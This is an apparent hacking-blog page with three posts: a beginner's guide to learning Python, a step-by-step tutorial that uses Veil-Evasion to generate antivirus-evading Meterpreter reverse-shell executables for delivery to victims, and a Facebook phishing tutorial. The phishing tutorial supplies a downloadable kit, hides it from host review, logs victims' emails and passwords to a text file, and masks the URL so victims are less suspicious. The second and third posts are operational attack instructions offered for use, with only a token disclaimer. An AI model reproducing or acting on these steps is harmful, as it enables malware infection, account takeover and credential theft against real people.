Monday, 21 December 2015

Python: Noob Friendly Programming Language To Start Coding

learn python - first step to coding- picateshackz.com

Python is exploding. And there’s a reason for that. It’s awesome! It seems everyone is learning it, teaching it, and hacking with it. Folks are even making python puppets and writing poetry in Python. While Python is easy to learn, it’s not necessarily easy to learn.

This is not a discussion on how to hack or program with python, it’s a discussion on why I personally chose python as my first programming language. I’m not a developer, I’ve never written a program from source code to production. So when I started looking for a language to jump into I wanted something that could be used a stepping stone for lower level languages.
I chose python simply because I wanted to learn programming logic first, and syntax second. For those of you unfamiliar with those terms logic is how a program runs. It’s the decision making progress that determine what comes next and is derived of conditional statements such as if, if not, else, or’s etc. It’s the heart of any programming language and is usually the measure that separates good programmers from bad ones.
Syntax is how a program is written, it’s the way a language looks and reads/writes. Essentially syntax is programming grammar. Unlike grammar in the English language (Which I admit to being poor at) programs will NOT work unless you get the syntax exactly correct.
Logic is basically universal amongst all programs and to me is the difficult part while syntax can vary. This is exactly why I wanted to learn the logic first, once you understand how programming works you can kind of look at any program and pick it apart.

For example, in Java you would program:

public class HelloWorld{public static void main (String[] args){System.out.println(“Hello, World!”);}}

But in python 3 you would type:

print(“Hello, world!”)

As you can see these two look very different, but they do the same thing. They print “Hello, world!” to standard out. As you can see Java has quite a bit going on compared to python but there are similarities behind each of the languages. The string “Hello, World!” that is printed to standard out is encased within quotes, and you call a function to print within each language. System.out.println() in Java and print() in python3. As you begin to learn more about functions, modules, libraries, variable declaration, objects, data structures and so on you will find that the similarities are even more apparent and your ability to decode them will expand. This is why many people can program or work in several languages.
As you saw from the above example python is a very compact and concise language. If you combine the large community, human readable syntax, powerful libraries and tutorial quantities its an easy choice to see why I started with python.
I did not learn from one resource and I bounced around between several sites and books. While I am not fluent in python I offer this bit of advice. Stick with it, programming is difficult. Its easily the most difficult thing I’ve ever had to learn in my life. I found that even though I struggle with learning concepts and logic after a while my mind adapts and and I begin to understand concepts that used to give me a lot of trouble. So stick with it.
If you’re interested in python I recommend learning from the following resources in the following order. The following are the amazing resources I discovered and the hard-won lessons I learned on my adventure into programming.

Hack Through the Thicket

The best way to learn Python is with a project. Think of a (simple) problem you want to solve and start writing the program to get to the solution. I got sucked in with Twitter bots. I have a love/hate thing for Twitter. It’s like watching a river… a river full of garbage. But it’s a great place to learn Python. It’s so much fun to hack Twitter. It’s an incredible game of strategy: how much can you get away with before your account gets suspended? The best part is seeing immediate results. I was hooked when I wrote my first Twitter bot and saw the status update appear on my time line. “Hello, World!” on your Twitter account is much cooler than “Hello, World!” on your IDLE prompt.
I understand that it t can be difficult for a beginner to think of a project when he or she doesn’t know what the language is capable of doing. Here’s a starter project that you, knowing nothing about Python at the outset, could easily accomplish in a day:
write a password generator.
You will utilize all the basics, and then some, in writing a program that produces the perfect password. It’s a very simple script, but you can geek-out and get crazy complex with it.

Hit the Books

Before you start or hack an existing project, you need to know the basics. There are a lot of Python books out there. While all of them will teach you what you need to know, some are better than others. These are my favorites, in order of accessibility:

1. Think Python

Downey gets you thinking like a programmer, which is more important than knowing or learning what every damn little thing does. Don’t fill your brain with with this stuff. That’s what Google is for.
Each chapter is loaded with exercises that ask you to use what you just learned to solve interesting, more or less practical, problems.
It’s free online.

2. python.org

Seriously, what better place to learn Python than from the source. The tutorials are actually good. It’s like they really want you to learn this stuff. It’s technically not a book, but what’s a book anymore?

3. Practical Programming

This book is very good at not only explaining how Python works, but how your computer works as well, and why it’s important to know as a programmer. The authors also run a MOOC on Coursera, but the book is so much better. Buy it on Amazon.

4. Real Python for the Web

The Real Python ebook package is amazing. You will go from noob to (almost) pro in an amazingly short amount of time. As the title suggests, it’s catered to those wanting to use Python for web development. If that’s you, throw down the money and get the bundle. It’s worth every penny.
The three gentlemen behind Real Python are approachable, knowledgeable, and witty. They sporadically post tutorials on their blog that range from beginner to advanced. Start with Lyricize: A Flask app to create lyrics using Markov chains. You will not only learn Python, you’ll be introduced to Flask and Markov chains while creating an app that is pretty cool.

5. Writing Idiomatic Python

Jeff Knupp knows his stuff. Much of what he covers in his book is advanced, but what better time to learn best practices than when you’re just starting out. The examples are easy to follow and understand and you will be setting yourself up for the future. His blog, Everything I Know About Python…, is specifically focused on web developers using Django or Flask, but he often writes about Python in general. Starting a Python Project the Right Way is an excellent introductory post.


Non-trivial Pursuit

StackExchange

Search for solutions to your problem. I don’t mean that in some metaphysical, philosophical way. I mean use a search engine. When you do, go to any Stack link first. There are a lot of content farms and dead end links out there. Your time is precious, especially when you’re learning Pythion in your free time. Go to Stack Exchange and you will find more than one answer and often an interesting debate about best practices.
Caveat: StackExcahnge can be frustrating for beginners because you have to earn reputation points. It makes sense, but it also makes it seem impenetrable. Pay your dues. It’s worth it. Also, it’s not just for programming. It’s massive.

GitHub

GitHub is a great resource for beginners because so many beginners create repositories for their early projects. These simple programs will demonstrate how to practically implement the concepts you are learning elsewhere. I found countless Twitter bot scripts on GitHub that I downloaded, hacked, and modified. When you define the problem you want to solve, search GitHub. Chances are someone else already wrote a solution. Clone or fork their repo and see how they solved your problem. Then proceed to tear it apart until it does exactly what you want. To get started with GitHub, create an account and check out their bootcamp.
If you take this approach you’ll begin to get comfortable with Git and Github. If you want to get serious, and you’re also a Linux enthusiast, you should learn both. A lot of Pythonistas swear by Mercurial and Bitbucket. I’ve only used them cursorily, so I can’t say anything one way or another. I started with Git. It works for me. I’ll stick with Git.

Lists & Newsletters

Tutor

Sign up for the Python Tutor list. I learned, and still learn, so much from it. But, be warned. The temperament of the list changes seasonally. It will swing from compassionate to cruel. When it turns sour, I usually unsubscribe for a few months, and I’ll resubsrcibe when I need help with a problem and stick with it until it gets bad.
Also, your Inbox will quickly fill up with mail from the list. You should read every email and follow the discussions as they evolve, even if you don’t grok.

Python Weekly

Sign up for Python Weekly. While most of it will be over your head in the beginning, you will receive an excellent recap of the goings-on in the Python community for the past seven days. Read through ALL of the headlines, but only click on those that you understand. After a few months, you’ll be opening every link and frustrated because you don’t have enough time to read and work through all of the posts.

The Stuff That’s Really Popular

You may have noticed that there are a number of obvious omissions from my lists above.
Everyone cites Zed Shaw’s Learn Python the Hard Way. It’s an excellent overview, but it’s not beginner-friendly. It was one of the first resources I encountered, but I could not stick with it. Now that I know the basics and I work back through Zed’s tutorials, I am able to see that it’s very good, but better suited for someone with programming experience making a transition to Python.
Some people love Codecademy, but I felt like they were holding my hand through the lessons and when they let go at the end, I was completely lost. Also, programming in a browser based shell doesn’t feel right. If you really want to learn Python, do it locally, with IDLE or your shell.
My last employer was a lynda.com subscriber, so I took advantage of the opportunity and, well, slept through the Python courses they offered. I find screencasts very hard to watch.
And then there’s the MOOCs: Coursera, edX, and Udacity. I’ve started and never finished courses in each. I find the pace of MOOCs frustratingly slow and unless you’re taking the course in real time, you can’t access the faculty or community for help when you hit a wall. If you have A LOT of time to kill, take these courses. Otherwise, carve your own path. You’ll learn much more and arrive at the same destination much faster.

Conclusion

I hope these suggestions are useful and helpful. At the end of the day, you are your best resource. You drive the learning, don’t let the learning drive you. In the spirit of the origins of the language, the best way to learn Python is with a sense of humor. Now get hacking.

Recommended Articles:

Saturday, 19 December 2015

How To Bypass Antivirus Detection Using Veil-Evasion In Kali Linux

bypass-av-veil-kali-picateshackz.com

Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.One of the most important issues any hacker must address is how to get past security devices and remain undetected. These can include antivirus software, intrusion detection systems, firewalls, web application firewalls, and numerous others. As nearly all of these devices employ a signature-based detection scheme where they maintain a database of known exploits and payload signatures, the key is to either create your own exploit, or
change the signature of a known exploit or payload.
As creating your own exploit and payload is both time-consuming and requires advanced skills, the novice hacker is better served by first attempting to change the signature of the exploit and payload.
Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some examples about how to bypass severals anti-virus.

The main changes in this version is:
  • x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
  • Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.
There are tutorials available at http://www.veil-evasion.com The framework can be downloaded from Chris' github at https://github.com/ChrisTruncer/Veil/ or at https://github.com/ChrisTruncer/Veil/archive/master.zip.

How to setup?

Veil-Evasion’s code is located at https://www.github.com/Veil-Framework/Veil-Evasion/ and it’s a part of the Veil super project athttps://github.com/Veil-Framework/Veil which we recommend mosts users clone and install.

We can also use the payloads from Metasploit framework and its compatible for both x86 and x64 arch and update Veil either the command line or menu.

If you want to install Veil in your own environment you can use the commands below:
#wget -c https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
#unzip -q master.zip
#cd Veil-Evasion-master/setup
#./setup.sh

If you want to work with Kali Linux, with the commands below it will be enough:

apt-get update apt-get install veil

i am using kali linux for this tutorial, so i will start with second one.


1. Install Veil-Evasion


We first need to install Veil-Evasion on our system. We can download it from the Kali repository. Simply type:
kali > apt-get install veil-evasion

To start Veil-Evasion, just type:
kali > veil-evasion

When you do so, you will be greeted with this opening screen:

bypass-av-veil-kali-picateshackz.com

Veil will now begin its installation. It will ask you whether you want to install dependencies; tell it "y" for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select "Install for all users" and click the "Next" button.

bypass-av-veil-kali-picateshackz.com

Use the default directory when the install wizard asks, and then you will be greeted by a screen like below. Click "Next."

bypass-av-veil-kali-picateshackz.com

Eventually, you will come to a screen like that below. Go ahead and click "Next" again.

bypass-av-veil-kali-picateshackz.com

Continue to click "Next" through several screens until you finally come to a window with the "Finish" button. Click it. Eventually, your patience will be rewarded when you finally arrive at the screen below. Now we are ready to begin to use Veil-Evasion to create a nearly undetectable payload.

bypass-av-veil-kali-picateshackz.com


2. Create an EXE with a Payload


In this first step, we will create a simple .exe file that will contain a payload that enables us to own the victim's system. This could be used to send to the victim and having them click on it to execute it. Generally, this type of attack will be part of a social engineering attack.

Let's now type "list" as this will list all of the payloads that Veil-Evasion can work with.

bypass-av-veil-kali-picateshackz.com

Those of you who are familiar with Metasploit will recognize many of these payloads.


3. Use a Payload


In this case, let's use the ruby/meterpreter/rev_tcp, or number 44. Let's type:
> use 44

When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.

bypass-av-veil-kali-picateshackz.com

We will need to set LHOST and LPORT.
> set LHOST 192.168.1.101> set LPORT 6996

Of course, use the appropriate IP address and port for your circumstances.

Next, we need to tell Veil-Evasion to generate the executable.
> generate

bypass-av-veil-kali-picateshackz.com

As you can see in the screenshot above, Veil-Evasion has generated an new .exe file that I have named "newpayload.exe" (you can name it whatever you please).


4. Generate an Encrypted Payload to Evade Detection


Next, let's attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we will use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt. This payload type uses VirtualAlloc injection, which creates a executable area in memory for the shellcode and then locks that memory area in physical memory.

This is number 32 on our payload list, so type:
> info 32

It then returns info on this payload as seen below.

bypass-av-veil-kali-picateshackz.com

This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.

Next, let's tell Veil-Evasion we want to use this payload.
> use 32

bypass-av-veil-kali-picateshackz.com

Here we have the option to change the default options if we care to do so. For now, let's leave the default options as they are.

Next, let's tell Veil-Evasion we want to generate this encrypted payload.
> generate

bypass-av-veil-kali-picateshackz.com

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT. When we finish entering the appropriate information for our payload, it will begin to generate the shellcode. This can take few minutes, so be patient.

Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple "veilpayload."

bypass-av-veil-kali-picateshackz.com


Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.

bypass-av-veil-kali-picateshackz.com

This new code with the meterpreter embedded within will get past most AV software and security devices. Like anything else, the AV developers will likely find a way to detect even this payload, so be creative and try other payload obfuscation methods in Veil-Evasion until you find one that hides your payload.


5. Checking Antivirus detection


Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check "Do not distribute the sample". If you choose to don't check this options or you decide to submit the executable to www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.

bypass-av-veil-kali-picateshackz.com


You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!

bypass-av-veil-kali-picateshackz.com

Evading security software and devices is among the most important tasks of the hacker, and Veil-Evasion is another tool in our arsenal. Keep in mind, though, that there is NEVER a single, final solution. The hacker must be persistent and creative in finding ways past these devices, so if one method fails, try another, then try another, until you find one that works.

Recommended Tutorials:

Heartbleed Attack: Exploiting OpenSSL Vulnerability Using Metasploit
Msfvenom: One Single Tool Instead Of Msfpayload And Msfencode
How To Get Root Access When People Visit Your Website - Metasploit Exploiting IE8

Friday, 18 December 2015

Hack Facebook Using Phishing 2016 - Bypassing Security Check (Responsive)

fb phishing 1016- picateshackz

This is a complete tutorial for creating a facebook phishing site in 2016, newbies can follow this tutorial very easily. there are many ways to hack facebook accounts but unfortunately Everything wont work properly in now a days because today's IT security system is developed so far especially facebook. phishing is the popular method to hack fb but there is a lot of problems in present days, everybody can create a phishing page but the problem comes when hosting to free host sites like 000webhost.com.., and they will suspend the account immediately also some browser will warn it as a fake page. for a solution i have bypassed all the above issues and it will remain as Un-suspended and undetectable for browsers.

Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk.

I have included the responsive facebook phishing page files in this tutorials, so you wont take lot of time to demonstrate a phishing page yourself.


Features 

  • No suspension (From free web host)
  • Undetectable (Browser security check bypassed)
  • Responsive (It will work with Mobile And Desktop)
  • Url Mask (Hiding or changing phisher url)


    I have sorted this tutorial as 4 steps:

  1. Download the Attachment file, size:2.16 mb (Click here to download) or Alternate download
  2. Sign up to Free web host and upload the files
  3. URL masking/hiding
  4. Responsive Demonstration 

Step 1: Download the Attachment file

First of all download the attachment file named 'responsive-facebook.zip' file from here.

Extract the zip file and you will see 10 files named (data.php, data1.php, index.php, Mobile_Detect.php, desktop.jpg, follow.jpg, follow.jpg, desktop_files.zip, login_files.zip, users.txt) see below screenshot.


fb-phishing-2016-mobile/desktop- picateshackz.com


If you want to know how can you create yourself a phishing page then i recommend you to read my previous article: Create Undetectable Facebook Phishing Site - Advanced


Step 2: Sign up to Free web host and upload the files

I prefer 000.webhost.com.

Go to: https://members.000webhost.com/signup  and fill out the information needed and click on Create My Account.

fb-phishing-2016-mobile/desktop- picateshackz.com


Open your email and verify the account you will see the active domain in your account ,then  click on Go to CPanel (highlighted in below screen shot).

fb-phishing-2016-mobile/desktop- picateshackz.com


Now open the first file manager icon under File managers section.

fb-phishing-2016-mobile/desktop- picateshackz.com


Open up  “public_html” folder and delete the 2 files inside it. then click on “upload.

fb-phishing-2016-mobile/desktop- picateshackz.com


  • Below “Archive” section on the right side click on “Choose file“, Select the 2 files from downloaded attachment in step 1 (login_files.zip, desktop_files.zip)
  • Below “Files” section Choose the remaining 8 file (data.php, data1.php, index.php, Mobile_Detect.php, desktop.jpg, follow.jpg, follow.jpg, users.txt) 
  • Click on the “green tick“.
fb-phishing-2016-mobile/desktop- picateshackz.com

Done!!!, Now what will happen,when your hosting provider will test your content they will get a innocent php file reading another file.and when they try will to access "login.jpg" file they will get an invalid/corrupted image.

Now Access your URL with this id at end (/?id=facebook), This Unique Url is important for bypassing security check and i set the default id as facebook for this tutorial.

Example: "www.autolikerfb.comxa.com/?id=facebook"(See the Screenshot below)

fb-phishing-2016-mobile/desktop- picateshackz.com


When victim enter the email and and password in above page will be stored in our 'users.txt' file, to see that click the view button next to users.txt file.

fb-phishing-2016-mobile/desktop- picateshackz.com

Inside users.txt file you can see the victim's email and password (highlighted part in below screen shot).

fb-phishing-2016-mobile/desktop- picateshackz.com

Finally you have your phisher link like this: www.autolikerfb.comxa.com/?id=facebook


Step 3: Url Masking/Hiding

Now you have to hide the URL. That way it can be less suspicious. so here we use Dot TK url Shortening. your actual Phishing url can create a sense of doubt in victim's mind, we can hide the url. Dot.tk is an online service which enables you to hide/mask the url.

1. So, go to http://www.dot.tk/en/index.html?lang=en to hide a url.

2. Select shorten URL then enter your phisher link in the textbox and hit on Next. (our Phisher link: 
www.autolikerfb.comxa.com/?id=facebook )
3. Enter the link you want to rename your phisher link to dot.tk domain name.
(domain: autolikerfb )

Now we have the phishing url shortened like belove:

www.autolikerfb.comxa.com/?id=facebook  =  autolikerfb.tk

Now, you can send this masked phisher link to your victim.

The victim will now find our phisher link less suspicious as we have hidden the actual phisher link using .tk domain.


Step 4: Responsive Demonstration 

Here is the screenshot of autoliker.tk in mobile view and desktop version,it will automatically redirect to original facebook page when login. 


fb-phishing-2016-mobile/desktop- picateshackz.com
Mobile View
fb-phishing-2016-mobile/desktop- picateshackz.com
Desktop View